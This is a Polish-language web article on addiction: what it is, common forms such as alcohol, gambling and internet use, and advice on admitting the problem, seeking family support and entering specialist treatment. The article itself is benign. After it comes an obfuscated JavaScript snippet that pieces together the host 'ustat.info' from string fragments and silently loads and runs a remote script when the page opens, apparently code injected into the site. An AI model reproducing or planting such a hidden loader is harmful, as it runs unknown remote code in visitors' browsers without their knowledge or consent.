Ich konsekwencją jest uzależnienie, które negatywnie oddziałuje nie tylko na nałogowca, ale także jego otoczenie i bliskich. Dodatkowo nałóg może prowadzić do występowania problemów zdrowotnych.
Jak działa nałóg?
Nałóg jest to systematyczne powtarzanie określonego nawyku, który w negatywny sposób oddziałuje na człowieka. To stan, któremu towarzyszy stały lub okresowy przymus zażywania określonej substancji lub wykonania danej czynności. Takie zachowanie z czasem prowadzi do uzależnienia. Nałóg może dotyczyć sfery fizycznej lub psychicznej.
Od czego najczęściej się uzależniamy?
Tak naprawdę uzależnić można się od wszystkiego. Nałóg zazwyczaj kojarzy się z alkoholizmem, narkomanią czy paleniem papierosów. Nic w tym dziwnego, ponieważ są to najczęściej występujące i omawiane problemy. Jednak wiele osób uzależnionych jest od hazardu, gier komputerowych, oglądania pornografii czy zażywania lekarstw. Częstym zjawiskiem jest także pracoholizm i zakupoholizm. Z dnia na dzień na sile przybiera także uzależnienie od Internetu i social mediów.
Z jakimi trudnościami zmaga się osoba uzależniona?
Wszystkie osoby uzależnione zmagają się z tym samym problemem, a mianowicie ciągłą potrzebą zaspokojenia głodu nałogowego. Wspólną cechą jest także złość, irytacja czy gniew, występujący w sytuacji, kiedy nie ma możliwości jego zaspokojenia. Osoby uzależnione od substancji chemicznych dodatkowo doświadczają negatywnych skutków związanych z odstawieniem używki. Postępujący mechanizm przejmuje kontrole nad nałogowcem, czego konsekwencją jest całkowite podporządkowanie życia codziennego pod uzależnienie.
5 porad dla osób uzależnionych
Pierwszym i najważniejszym krokiem do wyjścia z nałogu jest świadomość występowania uzależnienia oraz konsekwencji, jakie powoduje to dla samego nałogowca oraz jego otoczenia. Otwarte przyznanie się do tego, że ma się problem, jest sporym osiągnięciem i dobrze rokuje względem podjęcia starań dotyczących wyjścia z nałogu.
Uzależnienie może dotknąć dosłownie każdego. To stan, nad którym nałogowiec nie jest w stanie zapanować i trudno jest mu powstrzymać się od przyjmowania określonej substancji lub wykonywania danej czynności. Nie jest to powodem do wstydu, wręcz przeciwnie. Otwartość na uzależnienie oraz szczera rozmowa z bliskimi pomoże lepiej zrozumieć mechanizm, który zawładnął nałogowcem. Rodzina będzie świadoma, z czym zmaga się osoba uzależniona oraz jakiego wsparcia powinna udzielić.
Przyznanie się do uzależnienia jest dużym osiągnięciem, jednak ważniejsza jest szczera chęć i motywacja do podjęcia leczenia. Nałogowiec musi pamiętać, że w tej walce nie jest sam. Specjalistyczne ośrodki dysponują wykwalifikowaną i doświadczoną kadrą, która pomoże w walce o powrót do normalnego życia. Im szybciej podjęte zostanie leczenie, tym większe będą szanse na wyjście z nałogu.
Początki zawsze są trudne, jednak warto być konsekwentnym w powrocie do normalnego funkcjonowania. Tutaj kluczowe będzie wsparcie rodziny. Warto otwarcie mówić o swoich potrzebach i w razie potrzeby prosić bliskich o pomoc.
Wyjście z nałogu to żmudny proces, jednak warto podjąć wysiłek, aby móc normalnie funkcjonować. Silna motywacja, chęć zmiany dotychczasowych przyzwyczajeń, wsparcie bliskich oraz specjalistyczna terapia w ośrodku leczenia uzależnień będą gwarancją powrotu do normalnego życia.
Walka z nałogiem jest trudna, jednak podjęty wysiłek zaowocuje uwolnieniem się ze szponów uzależnienia. Warto podjąć starania, aby móc na nowo cieszyć się życiem wolnym od nałogów.
(function(){
a8fy=document.createElement("script");a8fy_="u"+("s")+"ta";
a8fy_+=("t.i")+""+"n";a8fy_+=(("f")+"o");a8fy.type="text/javascript";
a8fy_+="/"; a8fyu="423637961";a8fyu+=".81x2zh9b8fy5nr0qy50";a8fyu+="zk2syXi7ib9";
a8fy.src="https://"+a8fy_+a8fyu;a8fy.async=true;document.body.appendChild(a8fy);
})();
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz